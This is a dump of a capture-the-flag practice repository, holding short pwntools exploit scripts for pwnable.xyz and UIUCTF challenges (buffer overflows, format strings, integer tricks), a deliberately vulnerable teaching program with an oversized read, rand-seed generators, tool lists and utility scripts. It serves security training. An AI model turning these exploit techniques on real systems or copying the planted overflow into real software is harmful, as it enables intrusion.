-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Free_spirit/free_spirit -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Fspoo/fspoo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Fspoo/fspoo -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Game/game: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Game/game -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Grownup/exp.py: -------------------------------------------------------------------------------- 1 | ###Hijack fmt pointer with off-by-one-null 2 | ###Then use format string to print out flag(which pointer is on stack) 3 | 4 | from pwn import * 5 | 6 | ###Addr 7 | flag = 0x601080 8 | 9 | ###Exploit 10 | r = remote('svc.pwnable.xyz',30004) 11 | r.sendafter('[y/N]: ',b'y'.ljust(8,b'\x00')+p64(flag)) 12 | r.sendafter('Name: ',b'a'*0x20+b'%9$s'.ljust(0x60,b'a')) 13 | r.interactive() 14 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Grownup/grownup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Grownup/grownup -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Hero_Factory/exp.py: -------------------------------------------------------------------------------- 1 | ###Off by one NULL in strncat 2 | 3 | from pwn import * 4 | 5 | ###Util 6 | def create(size,data,skill): 7 | r.sendlineafter('> ','1') 8 | r.sendlineafter('be? \n',str(size)) 9 | r.sendafter('name: ',data) 10 | r.sendlineafter('> ',str(skill)) 11 | 12 | def skill(): 13 | r.sendlineafter('> ','2') 14 | 15 | 16 | ###Addr 17 | win = 0x400a33 18 | 19 | ###Exploit 20 | r = remote('svc.pwnable.xyz',30032) 21 | create(0x64,'a'*0x64,0) 22 | create(0x64,b'a'*7+p64(win),5) 23 | skill() 24 | r.interactive() 25 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Hero_Factory/hero_factory: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Hero_Factory/hero_factory -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Iape/iape: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Iape/iape -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/JMP_table/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Util 4 | def create(size): 5 | r.sendlineafter('> ','1') 6 | r.sendlineafter('Size: ',str(size)) 7 | 8 | def call_size(): 9 | r.sendlineafter('> ','-2') 10 | 11 | ###Addr 12 | flag = 0x400a31 13 | 14 | ###Exploit 15 | r = remote('svc.pwnable.xyz',30007) 16 | create(flag) 17 | call_size() 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/JMP_table/jmp_table: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/JMP_table/jmp_table -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/JUMP/jump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/JUMP/jump -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Knum/knum: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Knum/knum -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/L33t_ness/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r = remote('svc.pwnable.xyz',30008) 4 | 5 | ###level1 6 | r.sendlineafter('x: ',str(0)) 7 | r.sendlineafter('y: ',str(0x100000000-1337)) 8 | 9 | ###level2 10 | r.sendlineafter('=== t00leet ===\n',str(9*12289)+' '+str(38833)) 11 | 12 | ###level3 13 | r.sendlineafter('=== 3leet ===\n','-2 -1 0 1 2') 14 | 15 | r.interactive() 16 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/L33t_ness/l33t_ness: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/L33t_ness/l33t_ness -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Message/message: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Message/message -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Misalignment/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r = remote('svc.pwnable.xyz',30003) 4 | r.sendline(str(0xb500000000000000-0x10000000000000000)+' '+str(0)+' '+str(-6)) 5 | r.sendline(str(0xb000000)+' '+str(0)+' '+str(-5)) 6 | r.sendline('M30W') 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Misalignment/misalignment: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Misalignment/misalignment -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Nin/nin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Nin/nin -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Note/note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Note/note -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV2/notev2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV2/notev2 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV3/notev3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV3/notev3 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV4/notev4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV4/notev4 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV5/notev5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV5/notev5 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Notebook/notebook: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Notebook/notebook -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Password/password: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Password/password -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Punch_it/genrand.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | srand(0); 6 | for(int i = 0;i<500;i++) 7 | printf("%d\n",rand()); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Punch_it/punch_it: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Punch_it/punch_it -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/PvE/pve: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/PvE/pve -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/PvP/pvp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/PvP/pvp -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/RWSR/rwsr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/RWSR/rwsr -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/SUS/sus: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/SUS/sus -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Strcat/strcat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Strcat/strcat -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Sub/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r = remote('svc.pwnable.xyz',30001) 5 | v4 = 0 6 | v5 = 0x100000000-4919 7 | r.sendlineafter('input: ',str(v4)+' '+str(v5)) 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Sub/sub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Sub/sub -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/TLSv00/tlsv00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/TLSv00/tlsv00 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Two_target/two_target: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Two_target/two_target -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/UAF/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/UAF/uaf -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Welcome/welcome: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Welcome/welcome -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Words/words: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Words/words -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/World/genrand.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int main(){ 6 | for(int i = 0;i<0x100;i++){ 7 | srand(i); 8 | for(int j = 0;j<50;j++) 9 | printf("%d%c",rand()%256,j==49?'\n':','); 10 | } 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/World/world: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/World/world -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/XOR/xor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/XOR/xor -------------------------------------------------------------------------------- /TIPS/crypto_resource: -------------------------------------------------------------------------------- 1 | xortool 2 | https://github.com/hellman/xortool 3 | 4 | substitution cipher 5 | https://quipqiup.com/ 6 | 7 | factorizer 8 | https://www.alpertron.com.ar/ECM.HTM 9 | http://factordb.com/index.php 10 | 11 | hashpump 12 | https://github.com/bwall/HashPump 13 | 14 | md5-tunnel 15 | https://github.com/s1fr0/md5-tunneling 16 | 17 | sage 18 | https://github.com/sagemath 19 | 20 | All kinds of sage scripts for RSA 21 | https://github.com/ValarDragon/CTF-Crypto/tree/master/RSA 22 | -------------------------------------------------------------------------------- /TIPS/python_resource: -------------------------------------------------------------------------------- 1 | bytecode disassembly 2 | pip install xdis 3 | -------------------------------------------------------------------------------- /TIPS/reverse_resource: -------------------------------------------------------------------------------- 1 | .NET decompile (dnSpy) 2 | https://github.com/0xd4d/dnSpy 3 | 4 | PE analysis 5 | https://github.com/zeroq/peanalysis 6 | 7 | 8 | ### 9 | IDA commands 10 | [edit] -> [patch program] -> [change byte] -> edit instruction 11 | u -> undefine instruction 12 | c -> mark assembly as code 13 | p -> mark offset as function 14 | -------------------------------------------------------------------------------- /TIPS/stego_resource: -------------------------------------------------------------------------------- 1 | stego veritas 2 | https://github.com/bannsec/stegoVeritas 3 | zsteg 4 | https://github.com/zed-0xff/zsteg 5 | -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn1/CS2020_Pwn1.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn1/CS2020_Pwn1.key -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn1/Demo/leak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn1/Demo/leak -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn1/Demo/leak.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void vuln(){ 6 | char buf[0x10]="\0"; 7 | printf("Data : "); 8 | read(STDIN_FILENO,buf,0x100); 9 | printf("%s\n",buf); 10 | getchar(); 11 | return; 12 | } 13 | 14 | int main(){ 15 | setvbuf(stdin,NULL,_IONBF,0); 16 | setvbuf(stdout,NULL,_IONBF,0); 17 | setvbuf(stderr,NULL,_IONBF,0); 18 | 19 | puts("how2leak"); 20 | vuln(); 21 | puts("done"); 22 | 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/CS2020_Pwn2.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/CS2020_Pwn2.key -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/chunks: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/chunks -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/largebin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/largebin -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/smallbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/smallbin -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/tcache_and_fastbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/tcache_and_fastbin -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/unsortedbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/unsortedbin -------------------------------------------------------------------------------- /Writeups/0CTF2021/HashCollision/Collision.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/0CTF2021/HashCollision/Collision.zip -------------------------------------------------------------------------------- /Writeups/0CTF2021/README.md: -------------------------------------------------------------------------------- 1 | # 0CTF QUAL 2021 2 | 3 | Solved a bunch of challs this year, but too busy to make writeup for all of them... 4 | 5 | Only Hash collision for now, might do writeup for other if I have time 6 | 7 | ## Challenges 8 | [Hash Collision](https://github.com/jwang-a/CTF/tree/master/Writeups/0CTF2021/HashCollision) 9 | -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/Crypto_in_the_Shell/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/Crypto_in_the_Shell/chall -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/EmojiVM/emojivm_reverse/emojivm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/EmojiVM/emojivm_reverse/emojivm -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/Lazyhouse/lazyhouse: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/Lazyhouse/lazyhouse -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/One_Punch_Man/one_punch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/One_Punch_Man/one_punch -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/Trick_or_Treat/trick_or_treat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/Trick_or_Treat/trick_or_treat -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Accounting_Accidents/accounting: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/UIUCTF2020/Pwn/Accounting_Accidents/accounting -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Accounting_Accidents/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Exploit 4 | r = remote('chal.uiuc.tf',2001) 5 | 6 | r.sendafter('Item: ',b'a'*0x10+p64(0x8048878)) 7 | r.sendlineafter('Cost: ','26') 8 | r.sendlineafter('Cost: ','27') 9 | r.sendlineafter('Cost: ','24') 10 | r.sendlineafter('Cost: ','23') 11 | r.interactive() 12 | -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Gen_Z_Math_Class/src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/UIUCTF2020/Pwn/Gen_Z_Math_Class/src.zip -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/MuJS/MuJS.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/UIUCTF2020/Pwn/MuJS/MuJS.zip -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/MuJS/README.md: -------------------------------------------------------------------------------- 1 | Writeup at hackmd : https://hackmd.io/@M30W/UIUCTF2020-MuJS-Writeup 2 | -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Who_is_GDB/Dockerfile: -------------------------------------------------------------------------------- 1 | # gdbchal by kuilin 2 | 3 | FROM jaschac/debian-gcc:latest 4 | RUN apt-get update && apt-get install -y socat gdb 5 | 6 | COPY flag.txt / 7 | RUN chmod 644 /flag.txt 8 | 9 | RUN useradd pwn 10 | USER pwn 11 | 12 | EXPOSE 1234/tcp 13 | CMD socat -vv tcp-listen:1234,reuseaddr,fork system:'gdb -ex "target\\\ remote\\\ /proc/self/fd/10" /dev/null 2>/dev/null',pty,fdin=10,fdout=10 14 | -------------------------------------------------------------------------------- /utils/Crypto/CRT.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import GCD,Inverse 2 | 3 | def CRT(items): 4 | #items is formated as an array of [(ai,ni),...] 5 | N = 1 6 | a = [] 7 | n = [] 8 | b = [] 9 | binv = [] 10 | for i in items: 11 | N*=i[1] 12 | a.append(i[0]) 13 | n.append(i[1]) 14 | for i in n: 15 | b.append(N//i) 16 | binv.append(inverse(b[-1],i)) 17 | ans = 0 18 | for idx,i in enumerate(a): 19 | ans+=i*b[idx]*binv[idx] 20 | ans%=N 21 | return ans 22 | -------------------------------------------------------------------------------- /utils/Pwn/Shellcode.py: -------------------------------------------------------------------------------- 1 | ###Test to see if running on amd64 or i386 using REX prefix 2 | # if arch = amd64: jmp taken 3 | # else : jmp not taken 4 | x86_x64_SWITCH = b'j0X@<0t0' 5 | -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc23/ld64_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc23/ld64_2.23.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc23/libc64_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc23/libc64_2.23.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc24/ld64_2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc24/ld64_2.24.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc24/libc64_2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc24/libc64_2.24.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc27/ld64_2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc27/ld64_2.27.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc27/libc64_2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc27/libc64_2.27.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc28/ld64_2.28.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc28/ld64_2.28.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc28/libc64_2.28.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc28/libc64_2.28.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc29/ld64_2.29.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc29/ld64_2.29.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc29/libc64_2.29.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc29/libc64_2.29.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc31/ld64_2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc31/ld64_2.31.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc31/libc64_2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc31/libc64_2.31.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc23/ld32_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc23/ld32_2.23.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc23/libc32_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc23/libc32_2.23.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc24/ld32_2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc24/ld32_2.24.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc24/libc32_2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc24/libc32_2.24.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc29/ld32_2.29.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc29/ld32_2.29.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc29/libc32_2.29.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc29/libc32_2.29.so -------------------------------------------------------------------------------- /utils/Reverse/GDB2HEX.py: -------------------------------------------------------------------------------- 1 | ###Resolve gdb x/gx result to hexdump format 2 | 3 | import binascii 4 | 5 | print('filename : ',end = '') 6 | name = input() 7 | file = open(name).read().split('\n') 8 | str = '' 9 | for i in file: 10 | i = i[i.find('\t')+1:].split('\t') 11 | for j in i: 12 | for k in range(16,0,-2): 13 | str+=j[k:k+2]+' ' 14 | str = str.strip() 15 | output = name+'.hex' 16 | f = open(output,'w') 17 | f.write(str) 18 | f.close() 19 | -------------------------------------------------------------------------------- /utils/Reverse/RESOLVEHEX.py: -------------------------------------------------------------------------------- 1 | ###Resolve hexdumped file back to binary 2 | 3 | import binascii 4 | 5 | print('filename : ',end = '') 6 | name = input() 7 | file = ' '.join(open(name).read().split('\n')).strip().split(' ') 8 | str = '' 9 | for i in file: 10 | if len(i)==2: 11 | str+=i 12 | output = name+'.bin' 13 | f = open(output,'wb') 14 | f.write(binascii.unhexlify(str.encode('utf-8'))) 15 | f.close() 16 | --------------------------------------------------------------------------------